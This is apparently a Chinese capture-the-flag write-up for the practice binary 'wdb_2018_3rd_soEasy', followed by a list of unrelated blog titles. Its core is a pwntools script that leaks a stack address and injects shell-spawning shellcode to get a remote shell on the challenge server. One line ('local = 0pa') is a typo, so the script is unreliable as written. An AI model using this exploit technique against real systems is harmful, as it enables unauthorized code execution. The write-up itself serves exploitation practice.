wdb_2018_3rd_soEasy

保护全关

在栈上写入shellcode，然后ret2shellcode

from pwn import *

local = 0pa

binary = "./wdb_2018_3rd_soEasy"

port = "26500"

if local == 1:

	p = process(binary)

else:

	p = remote("node3.buuoj.cn",port)

def dbg():

	context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

context(arch = 'i386',os = 'linux')

p.recvuntil('Hei,give you a gift->')

leak_stack = int(p.recv(10),16)

shellcode = asm(shellcraft.sh())

payload = shellcode.ljust(0x48,'a')

payload += p32(0xdeadbeef) + p32(leak_stack)

p.recvuntil('what do you want to do?')

p.send(payload)

# gdb.attach(p)

p.interactive()

最新文章

1. 获得Map的选择集
2. webpack摸索（一）webpack-dev-server热模块替换
3. 基于Windows服务器集群的Redis主从配置指南
4. 你误解 .net 了吗？
5. BZOJ 4384: [POI2015]Trzy wieże
6. String.format中大括号的加入方法
7. man 在线手册
8. JDBC第四次学习
9. Node.js 创建第一个应用
10. c#电子印章制作管理系统
11. DSSM：深度语义匹配模型（及其变体CLSM、LSTM-DSSM）
12. （1.9）SQL优化——mysql导入导出优化
13. spark DataFrame 常见操作
14. [原创]互联网金融App测试介绍
15. （3）什么是函数(函数的定义、形参、实参、默认形参、可变长函数args|kwargs)
16. python文本 字符串开头或者结尾匹配
17. jsp页面的el表达式取数据
18. 使用vue
19. uoj problem 21 缩进优化
20. php第十六节课

热门文章

1. Halcon使用骨架法处理激光条并拟合直线
2. Depthwise Separable Convolution(深度可分离卷积）的实现方式
3. Spring Eureka 本地Docker集群部署
4. XSS平台简单使用
5. React 服务端渲染方案完美的解决方案
6. python学习笔记1之-python简介及其环境安装
7. Spring学习（九）--Spring的AOP
8. 用ThreadLocal来优化下代码吧
9. OpeMp【schedule】
10. sqli-labs第一关 详解